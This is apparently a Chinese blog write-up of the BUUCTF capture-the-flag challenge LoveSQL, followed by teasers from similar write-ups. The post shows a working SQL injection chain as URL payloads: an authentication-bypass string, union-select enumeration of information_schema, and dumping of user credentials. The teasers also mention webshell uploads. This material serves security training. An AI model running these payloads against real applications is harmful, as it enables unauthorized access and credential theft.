[极客大挑战 2019]LoveSQL

于 2022-09-05 11:57:47 发布
阅读量123 收藏
点赞数
分类专栏: # Web安全 文章标签: SQL注入 数据库 信息获取 安全漏洞 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Do1phln/article/details/126702269
版权

开屏一道SQL注入题目,先试试万能密码
http://bbebaf1d-6128-4a49-9450-c1b729df9780.node4.buuoj.cn:81/check.php?username=admin' or '1'='1&password=1

md5解密失败,回到注入的思路上

/check.php?username=admin' order by 3%23&password=1

字段数为3时,回显正常,使用union查询回显点位

/check.php
?username=1' union select 1,2,3%23
&password=1

得到回显点位为2和3,查询数据库相关信息

/check.php?username=1' union select 1,database(),version()%23
&password=1

接着查询表名

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

可以得到如上两个表,接着爆破各个表的字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser'%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

两个表均为以上结果,接着爆破各个表的数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

可以看到flag已经找到了,本题得解

Do1phln
关注
专栏目录
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 550
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 322
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
buuctf [极客挑战 2019]LoveSQL
qq_1873822的博客
03-04 148
又一次来到性感又有趣的题目 发现登录框,我们再试试万能密码登录, 在登录框中输入: 用户名:1' or 1=1# 密码:随便输 发现直接出密码,试试MD5解密,md5解密失败,接着回到注入的地方康康 在url中输入: /check.php?username=admin' order by 3%23&password=1 存在 /check.php?username=admin' order by 4%23&password=1 报错 注意:sql注入结尾的时候不能用#
BUUCTF [极客挑战 2019] LoveSQL
Senimo
03-25 3425
BUUCTF [极客挑战 2019] LoveSQL writeup 打开靶场,访问题目: 尝试登陆: 因为之前一题:BUUCTF 极客挑战 2019 EasySQL使用了万能密码完成了注入,所以再次尝试: xxx.buuoj.cn/check.php ?username=admin' or '1'='1 &password=1 得到了用户名和密码: 尝试密码md5解密失败,还...
[极客挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)
热门推荐
qq_45521281的博客
04-15 1万+
进去之后: 发现登录框,可能是万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 点击登录 跳转到了check.php页面。并得到了用户名和密码: 尝试密码md5解密失败,还是回到注入的思路上,查询字段数: 在url中输入: /check.php?username=admin' order by 3%23&password=1 ...
[极客挑战 2019]LoveSQL wp
{OvEr}的博客
11-19 180
[极客挑战 2019]LoveSQL wp 打开页面是这样的,我们先试试万能密码 显示登陆成功,通过上面的url可以判断有sql注入且为get方式下面我们来进行注入。 首先我们来查列数,注入 ?username=admin&password=123 %27 order by 4%23 发现不存在,说明有1,2,3列,继续我们来找注入点,注入语句 ?username=admin&password=123 %27 union select 1,2,3 %23 找到注入点是2,3
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2208
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1199
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
[极客挑战 2019]LoveSQL 1
最新发布
09-14
[极客挑战 2019]LoveSQL 1是一道题目或者比赛中的一个挑战。根据引用中提供的链接,我们可以看到相关的查询语句,并且通过注入点进行了SQL注入攻击。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在...
BUUCTF--[极客挑战 2020]Greatphp
qq_46263951的博客
08-11 1235
进入页面后可以看到给出的代码 <?php error_reporting(0); class SYCLOVER { public $syc; public $lover; public function __wakeup(){ if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($th
BUUCTF[极客挑战 2019]Secret File
楼阁de猫的博客
10-09 140
#[极客挑战 2019]Secret File 打开网址是这个界面 发现页面是黑色的背景,可能有东西被隐藏了,Ctrl+A全选一下试试 果然有东西。发现了一句话在网页最后,点进去看看 这里还有一个网页,点进去看看 什么玩意,难道刚刚闪过去一个页面我没看到?倒过去看也什么都没看出来 那可能是这样的,那就抓包一下 果然有东西,发现了secr3t.php 访问一下 发现过滤了这些东西,但是没有过滤file,可以使用php的伪协议继续 ?file=php://filter/read=convert.b
[极客挑战2021]web wp
cosmoslin的博客
11-26 4173
极客挑战2021 Welcome2021 F12,提示请使用WELCOME请求方法来请求此网页 burp抓包,修改请求方法,发现f1111aaaggg9.php 再次请求得到flag Dark Tor浏览器访问即可 babysql 查库:babysql uname=-1' union select database(),2,3,4#&pwd=1 查表:jeff,jeffjokes uname=-1' union select group_concat(table_name),2,3,4 fro
BUUCTF——[极客挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5771
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
wasm逆向——(极客挑战2021wasm
weixin_52369224的博客
11-28 7307
WebAssembly是一种全新的Web编程语言,但是与JavaScript不同,它不是一种让你直接手动编写的语言,而是C / C ++,Rust,C#和TypeScript等不断增加的上层语言的编译目标。 wasm是基于堆栈的虚拟机的二进制指令格式 wabt包安装 尝试了gitclone的方法,一直没安装成功,尝试: sudo apt install wabt 我的环境:ubuntu20.4 WABT(我们将其称为“ wabbit”)是用于WebAssembly的一套工具,包括: wa.
日常练习之web(极客挑战 2019 BuyFlag
doraemon12345的博客
11-30 164
打开题目没看懂,让干嘛的,在右上角发现pyflag字样 点进去看看,也没啥有用的信息,f12看一下源码发现提示 需要post传入password和money,要让password=404 ,发现函数is_numeric,去学习一下 说白了就是一个判断变量的函数,空格,%00,%20,这类的都可以绕过,后来我自己试验了一下发现这道题404后面跟一个字符(a,b,!,*等等可以自己试一下)也可以绕过,先传参抓包。 出现一个user=0,给他改成user=1。 如果你money不够多就会出现loser 太惨了
【Writeup】第六季极客挑战(部分题目)
企鹅学coding~
10-31 6866
好久没做CTF题了,一是感觉前几次网赛被虐的够呛,二是各种杂事也越来越多。偶然看到了网上这套成都信息工程大学的练习题,感觉难度上比较适合我这种菜鸟,于是抽空做了一些,然而由于水平和时间原因最终也才完成11/41,这里就记录一下我解出的11道题。以及将来学会的题,也会在后面增加。
[原题复现][极客挑战 2019]HardSQL(update报错注入)
笑花大王
02-15 2970
简介 原题复现: 考察知识点:SQL注入(报错注入,绕过过滤) 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台 特别感谢!) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 复现 经过手工测试过滤了and、= 空格 union等多个sql关键字 要思考如何绕过这些关键字去注入! 使用updatexml报错法注入 查数据库信息 http://1bfb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值